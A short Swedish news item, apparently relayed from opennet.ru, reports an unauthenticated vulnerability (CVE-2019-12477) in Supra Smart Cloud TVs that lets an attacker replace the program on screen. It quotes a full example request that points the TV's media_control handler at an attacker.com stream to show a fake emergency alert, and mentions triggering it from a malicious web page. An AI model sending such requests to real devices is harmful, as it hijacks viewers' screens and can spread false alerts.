På Supra Smart Cloud TV sårbarhet (CVE-2019-12477) som gör att du kan ersätta det program som visas för närvarande med innehållet från angriparen. Som ett exempel visas resultatet av en fiktiv varning om en nödsituation.
För en attack räcker det med att skicka en specialgjord nätverksbegäran som inte kräver autentisering. I synnerhet kan du komma åt "/remote/media_control?action=setUri&uri="-hanteraren genom att ange URL:en för m3u8-filen med videoparametrar, till exempel "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.”
I de flesta fall är åtkomsten till TV:ns IP-adress begränsad till det interna nätverket, men eftersom förfrågan skickas via HTTP är det möjligt att använda metoder för att komma åt interna resurser när användaren öppnar en specialdesignad extern sida (exempelvis under skepnaden av en bildförfrågan eller med hjälp av ).
Källa: opennet.ru